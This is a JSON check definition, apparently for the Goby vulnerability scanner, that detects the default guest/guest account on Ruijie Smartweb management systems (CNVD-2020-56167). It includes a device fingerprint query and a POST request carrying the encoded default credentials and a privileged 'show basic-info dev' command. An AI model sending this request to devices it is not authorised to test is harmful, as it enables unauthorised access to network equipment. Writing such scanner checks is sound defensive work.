Goby/json/Ruijie_Smartweb_Default_Pas...

61 lines
2.5 KiB
JSON

{
"Name": "Ruijie Smartweb Default Password CNVD-2020-56167",
"Level": "1",
"Tags": [
"defaultaccount"
],
"GobyQuery": "app=\"Ruijie-WiFi\" && body=\"无线smartWeb--登录页面\"",
"Description": "Ruijie Networks Co., Ltd. is a provider of ICT infrastructure and industry solutions. Its main business is R&D, design and sales of network equipment, network security products and cloud desktop solutions.",
"Product": "Ruijie Smartweb Management System",
"Homepage": "http://www.ruijie.com.cn/",
"Author": "",
"Impact": "Ruijie smartweb management system opens the guest account vulnerability by default , and the attacker can log in to the background through the vulnerability to further attack (guest/guest)",
"Recommendation": "",
"References": [
"https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167"
],
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/WEB_VMS/LEVEL15/",
"follow_redirect": false,
"header": {
"Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q="
},
"data_type": "text",
"data": "command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant."
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "Level was: LEVEL15",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}